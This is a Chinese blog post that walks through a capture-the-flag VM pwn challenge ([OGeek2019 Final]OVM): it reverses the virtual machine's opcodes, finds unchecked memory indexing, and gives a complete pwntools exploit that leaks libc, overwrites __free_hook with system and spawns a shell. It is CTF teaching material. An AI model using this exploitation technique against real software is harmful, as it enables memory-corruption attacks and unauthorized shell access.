【八芒星计划】 VM PWN

最新推荐文章于 2023-08-06 21:43:46 发布
最新推荐文章于 2023-08-06 21:43:46 发布
阅读量487 收藏 2
点赞数 1
分类专栏: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/108350871
版权
CTF 同时被 2 个专栏收录
27 篇文章 3 订阅
订阅专栏
PWN
24 篇文章 1 订阅
订阅专栏

这篇用来记录VM PWN
先申明本篇文章资料来源:

https://blog.csdn.net/weixin_44145820/article/details/106600382
https://www.anquanke.com/post/id/208450#h2-1
https://xz.aliyun.com/t/6865

文章目录

vm pwn最关键的就是逆向相关程序,理解每个指令的作用,漏洞大多数都是数组越界
先介绍一些基础的概念:

1.虚拟机保护技术
所谓虚拟机保护技术,是指将代码翻译为机器和人都无法识别的一串伪代码字节流;在具体执行时再对这些伪代码进行一一翻译解释,逐步还原为原始代码并执行。这段用于翻译伪代码并负责具体执行的子程序就叫作虚拟机VM(好似一个抽象的CPU)。它以一个函数的形式存在,函数的参数就是字节码的内存地址。

2.VStartVM
虚拟机的入口函数,对虚拟机环境进行初始化

3.VMDispather
解释opcode,并选择对应的Handler函数执行,当Handler执行完后会跳回这里,形成一个循环

4.opcode
程序可执行代码转换成的操作码

寄存器
PC 程序计数器,他存放的是一个内存地址,该地址中存放着 下一条 要执行的计算机指令
SP 指针寄存器,永远指向当前栈顶。
BP 基质指针。也是用于指向栈的某些位置,在调用函数的时候会用到它
AX 通用寄存器,我们的虚拟机中,它用于存放一条指令执行后的结果
在程序中 PC的初始值指向目标代码的 main 函数

指令集
虚拟机定义的时候 会定义一个 全局变量的 枚举类型 里面有我们需要的指令
如 :MOV,ADD 之类的

vm pwn会模拟出stack,寄存器,内存

[OGeek2019 Final]OVM

非常基础的一道vm pwn
先看main函数
在这里插入图片描述
读入pc,sp,codesize,code,然后执行execute,最后再往comment[0]所指向的地址写入内容,然后free comment[0]

看看execute函数
在这里插入图片描述
这里是本题最重要的部分,要仔细慢慢地逆向每个opcode

本题使用的是定长指令,一共32bits,每一个占8bits,操作码占用8bits,寄存器只占4bits,一共16个寄存器,格式如下

操作码 | 目的寄存器编号 | 操作数2寄存器编号 | 操作数1寄存器编号

模拟的寄存器,stack和内存
在这里插入图片描述

在这些数据的上方,可以找到stderr的指针,利用它可以得到_IO_2_1_stderr_的地址,该地址+0x10A8即为_free_hook

在这里插入图片描述
以下分析借用L.o.W师傅的

dst = (a1&0xf0000)>>16
dst = reg[dst]
op2 = (a1&0xf00)>>8
op2 = reg[ope2]
op1 = a1&0xf
op1 = reg[op1]

0x10:
dst = a1&0xff

0x20:
dst = ((a1&0xff)==0)

0x30:
dst = memory[op1]

0x40:
memory[op1] = dst

0x50:
tmp = reg[13]
reg[13]++
stack[tmp] = dst

0x60:
reg[13]--
dst = stack[reg[13]]

0x70:
dst = op1 + op2

0x80:
dst =  op2 - op1

0x90:
dst =  op1 & op2

0xA0:
dst =  op1 | op2

0xB0:
dst = op1 ^ op2

0xC0:
dst =  op2 << op1

0xD0:
dst =  op2 >> op1

0xE0:
running=0
if !reg[13]:
	exit
show all reg

我们可以看到
在这里插入图片描述
在这里插入图片描述
内存读写是没有检查下标的,这样就会产生数组越界漏洞

本题思路:
①利用数组越界漏洞让reg[2]和reg[3]得到_IO_2_1_stderr的地址
②利用指令组成出0x10A0
③让reg[2]+0x10A0
④利用数组越界把reg[2]和reg[3]的地址写入comment[0],也就是把free_hook-8的地址写入comment[0],然后退出打印所有寄存器的值,得到libc
⑤把/bin/sh和system写入comment[0],修改free_hook为system,最后sendcomment触发free来getshell

完整exp:

from pwn import *
from LibcSearcher import * 

local_file  = './ovm'
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc_buu = '/root/glibc-all-in-one/libs/buu/libc-2.23.so'

select = 0

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('', )
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
def opcode(code, dst, op1, op2):
	res = code<<24
	res += dst<<16
	res += op1<<8
	res += op2
	return str(res)
r.recvuntil("PC: ")
r.sendline('0')
r.recvuntil("SP: ")
r.sendline('1')
r.recvuntil("CODE SIZE: ")
r.sendline('24')
r.recvuntil("CODE: ")
sl(opcode(0x10, 0, 0, 26)) #reg[0] = -26
sl(opcode(0x80, 1, 1, 0)) #reg[1] = -26
sl(opcode(0x30, 2, 0, 1)) #reg[2] = memory[reg[1]]
sl(opcode(0x10, 0, 0, 25)) #reg[0] = 25
sl(opcode(0x10, 1, 0, 0)) #reg[1] = 0
sl(opcode(0x80, 1, 1, 0)) #reg[1] = -25
sl(opcode(0x30, 3, 0, 1)) #reg[3] = memory[reg[1]]

sl(opcode(0x10, 4, 0, 1)) #reg[4] = 1
sl(opcode(0x10, 5, 0, 12)) #reg[5] = 12
sl(opcode(0xc0, 4, 4, 5)) #reg[4] = 1<<12 = 1000
sl(opcode(0x10, 5, 0, 0xa)) #reg[5] = 0xa
sl(opcode(0x10, 6, 0, 4)) #reg[6] = 4
sl(opcode(0xc0, 5, 5, 6)) #reg[5] = 0xa0
sl(opcode(0x70, 4, 4, 5)) #reg[4] = reg[4]+reg[5] = 0x10a0
sl(opcode(0x70, 2, 4, 2)) #reg[2] = reg[4]+reg[2]

sl(opcode(0x10, 4, 0, 8)) #reg[4] = 8
sl(opcode(0x10, 1, 0, 0)) #reg[1] = 0
sl(opcode(0x80, 1, 1, 4)) #reg[1] = 0-8 = -8
sl(opcode(0x40, 2, 0, 1)) #memory[reg[1] = reg[2]]
sl(opcode(0x10, 5, 0, 7)) #reg[5] = 7
sl(opcode(0x10, 1, 0, 0)) #reg[1] = 0
sl(opcode(0x80, 1, 1, 5)) #reg[1] = reg[1] - reg[4] = -7
sl(opcode(0x40, 3, 0, 1)) #memory[reg[1]] = reg[3]
sl(opcode(0xe0, 0, 0, 0)) #exit

ru('R2: ')
low = int(rc(8), 16) + 8
ru('R3: ')
high = int(rc(4), 16)
print hex(low), hex(high)
libc_base = (high<<32) + low - libc.sym['__free_hook']
info('libc_base', libc_base)
system = libc_base + libc.sym['system']
sl('/bin/sh\x00'+p64(system))

r.interactive()
真岛忍
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VM pwn入门
weixin_44145820的博客
06-07 2072
VM pwn貌似是最近火起来的一类PWN题。最近打的好几场比赛都出现了VM pwn的题目,正好在BUU上面遇到一道2019年的OGeek中出现的VM pwn题,感觉应该会比较简单,另外听说高校战役里的EasyVM也是偏简单的VM pwn题。本文就主要对这两道题目进行分析。 [OGeek2019 Final]OVM 程序分析 作为VM pwn的第一步就是需要搞清楚指令的格式,操作码和操作数 本题使用的是定长指令,一共32bits,每一个占8bits,但除了操作码能利用完8bits之外,寄存器只占4bits,
Antctf-vmpwn
03-15
Antctf-real_vmpwn写 该主题通过对vmware dhcp组件进行了神奇的修改,介绍了旧版本中的cve-2020-3947 UAF漏洞和静默固定变量未初始化的漏洞。 此漏洞组合可能导致较低版本(<15.1.2)的实际转义,因此将该漏洞命名为real_vmpwn
VMPWN
Amalllの博客
11-11 1035
1.虚拟机保护技术 所谓虚拟机保护技术,是指将代码翻译为机器和人都无法识别的一串伪代码字节流;在具体执行时再对这些伪代码进行一一翻译解释,逐步还原为原始代码并执行。这段用于翻译伪代码并负责具体执行的子程序就叫作虚拟机VM(好似一个抽象的CPU)。它以一个函数的形式存在,函数的参数就是字节码的内存地址。 2.VStartVM 虚拟机的入口函数,对虚拟机环境进行初始化 3.VMDispather 解释opcode,并选择对应的Handler函数执行,当Handler执行完后会跳回这里,形成一个循环
VMPWN入门
Stella_Leo的博客
08-25 685
title: vmpwn author: Ev3r date: 2021-08-19 20:28:14 tags: vmpwn categories: vmpwn vmpwn 当作一个vmpwn的入门了,一些设计基础先不谈了,直接来干货。 vmpwn常见设计 初始化分配模拟寄存器空间 初始化模拟栈空间 初始化分配模拟数据存储(buffer)空间 (data段) 初始化伪OPCODE空间 (text段) 常见流程 输入opcode 有一个分析器,循环分解我们输入的opcode来翻译出汇编指令,多为出.
vm-pwn入门
蚁景网安学院
09-21 646
亲爱的,关注我吧9/21文章共计2761个词预计阅读7分钟来和我一起阅读吧引言之前一直没去了解过vm-pwn,做一些题目对vm-pwn进行一个大体上的了解,算是入门。前置知识对指令有过了...
一道题目入门VMpwn
qq_40712959的博客
04-16 329
一道题目学习VMpwn 原理 VMpwn 程序通常都是模拟一套虚拟机,对用户输入的opcode进行解析,模拟程序的执行,故VMpwn常见设计如下: 初始化分配模拟寄存器空间(reg) 初始化分配模拟栈空间(stack) 初始化分配模拟数据存储空间(data) 初始化分配模拟机器指令(opcode)空间(text) [OGeek2019 Final]OVM 程序采用32bit定长指令,每个操作码、操作数均为8bit,其格式为: | opcode | dst | op1 | op2 | 程序具体指令参考
V&NCTF 2021 hh (vmpwn)
qq_51868336的博客
03-17 530
vm 这道题就是弄了一个vm,然后根据输入的code, 执行相应的操作 我的理解是 相当于在函数栈里伪造一个虚拟栈,又伪造了栈顶指针,然后在这个虚拟栈里你可以进行一些操作,如add(将栈顶两个元素相加),push,pop等,然后有时候由于检验不当,就会造成越界,导致原本操作只是在虚拟栈里变成了可以影响实际函数栈的数据,相当于可以劫持RBP,RET,如果能做到这一步,接下来就是常规的ROP了 这是add指令,stack[r_sp+1000]就相当于栈顶 push指令更好理解 注意到下面这两处 这两个指令
[OGeek2019 Final]OVM——详细入门VM pwn
最新发布
fzucaicai的博客
08-06 968
仔细分析代码都可以发现,这些操作都没有对数组的下标进行检查,这样会导致什么后果呢,举个例子,如果有一个重要数据B存在数组array[10]的内存前面,如果不对数组的下标进行检查的话,那么我就可以构造array[-1]并输出,就可以得到B的内容了。也就是说,我们给程序输入一串指令,这个程序会有自己独特的,对代码的理解,并进行像分解成机器码那样,执行,而像寄存器,栈空间,存储空间都是程序自己设计的,而不是系统分配的。这两个条件判断语句的目的是确保在进行内存释放操作之前,所提供的指针和大小都是有效的。
vmpwn一&高校战役Easyvm复现
qq_39948058的博客
08-27 283
高校战役Easyvm 前言:本人tcl,刚接触vm不久,这个看了别人的wp感觉难度还可以,决定自己复现一下大佬勿喷哈 此题思路:就是依靠任意地址写来打freehook,然后再一把唆onegadget可以system也可以!! int __cdecl main(int argc, const char argv, const char **envp) { void *buf; // ST2C_4 _DWORD *ptr; // [esp+18h] [ebp-18h] int v5; // [esp+AC
VMPWN的入门系列-2
蚁景网安学院
07-28 285
温馨提示:文章有点长,图片比较多,请耐心阅读实验四 VMPWN4题目简介这道题应该算是虚拟机保护的一个变种,是一个解释器类型的程序,何为解释器?解释器是一种计算机程序,用于解释和执行源代码。解释器可以理解源代码中的语法和语义,并将其转换为计算机可以执行的机器语言。与编译器不同,解释器不会将源代码转换为机器语言,而是直接执行源代码。即,这个程序接收一定的解释器语言,然后按照一定的规则对其进行解析,完...
持续更新 BUUCTF——PWN(三)
weixin_41748164的博客
03-04 884
这只是个人笔记,buuctf的刷题的第三篇,欢迎一起讨论重新搭建一个合适pwn环境:https://blog.csdn.net/weixin_41748164/article/details/127874334buuctf的前两页:https://blog.csdn.net/weixin_41748164/article/details/126325515。
[OGeek2019 Final]OVM
weixin_52878095的博客
03-19 3877
静态分析 拿到题目后第一件事先检查程序的保护机制 看到程序除了canary保护以为,其他保护都开了,丢到IDA里面静态分析,程序先是为comment参数分配了一块0x8c大小的内存,然后让我们输入指令起始位置和栈起始位置,然后将指令起始位置赋值给reg[13],将栈起始位置赋值给reg[15],而且指令的数量不能大于0x10000,然后就是需要我们一条一条输入指令,输入完毕后就读取指令并执行,最后会有一个向comment中写入数据然后调用sendcomment函数 然后我们分别看一下fetch() /
VMPWN的入门系列-1
YJ_12340的博客
07-27 1019
这是一道基础的VM相关题目,VMPWN的入门级别题目。前面提到VMPWN一般都是接收字节码然后对字节码进行解析,但是这道题目不接受字节码,它接收字节码的更高一级语言:汇编。程序直接接收类似”mov”、”add”之类的指令,可以把这道题目看作是一个执行汇编语言的处理器,相比于解析字节码的VM,逆向难度要大大减小。非常适合入门。
OGeek_2019_Final OVM题解
lifanxin的博客
05-24 764
WP程序分析程序主逻辑分析虚拟机指令分析利用思路exp总结 程序分析   本题目是一道典型的虚拟机题目,通过这道题目,我们可以学习一下VM pwn题的分析技巧和利用思路。   该题目程序和远程环境可以在buuoj上找到,下面老规矩先检查下程序信息,64位小端程序,没有开启栈保护。   做虚拟机的pwn题,我们可以分两大步骤进行,首先先分析一下这个程序是如何实现虚拟机功能的,也就是程序自身的大逻辑,然后我们再详细分析程序虚拟出来的指令,分析指令的过程可能会比较耗时,需要耐心。 程序主逻辑分析   我们首先来
CTF pwn题之虚拟机题型详解
lifanxin的博客
05-24 1500
虚拟机题型详解概述如何分析一个例子总结 概述   随着对pwn题的学习,慢慢开始接触VM虚拟机的pwn题了,刚开始做这种类型的题时会发现代码量比较大,略显复杂,复杂的部分主要是在用程序实现虚拟机指令那里。   其实这种题做法和普通pwn类似,也是寻找漏洞,复杂的地方在于需要我们去分析出虚拟机实现的指令,然后用这些指令操作进行漏洞利用。 如何分析   接下来介绍下如何分析,对于VM类型的pwn题,复杂的地方在于分析出该VM对应实现的指令,那么如何分析需要一定章法。这里需要简单知晓一些计算机组成原理和汇编语言的
linux IO_FILE 利用
热门推荐
sky123博客
03-29 3万+
基本结构 _IO_FILE_plus 定义如下: struct _IO_FILE_plus { FILE file; const struct _IO_jump_t *vtable; }; 包括一个结构体 file 和一个指针 vtable 。 其中 vtable 指向一个函数指针表,很多 IO_FILE 的攻击都是围绕它展开的。 _IO_FILE_plus 类型的结构有 _IO_2_1_stdin_ 、 _IO_2_1_stdout_ 和 _IO_2_1_stderr_ 。另外有头指针 _IO_
pwn专用虚拟机的简单工具配置
ACdream
08-02 3699
pwn选手的基本配置信息
nsctf_online_2019_pwn1(劫持IO_2_1_stdout来泄露地址)
seaaseesa的博客
04-30 1332
nsctf_online_2019_pwn1 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Edit功能里存在一个null off by one漏洞 没有show功能 我们可以利用fastbin attack,修改IO_2_1_stdout的_IO_write_base,这样,当再次调用puts或printf的时候,就会泄露出_IO_write_base~_IO_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值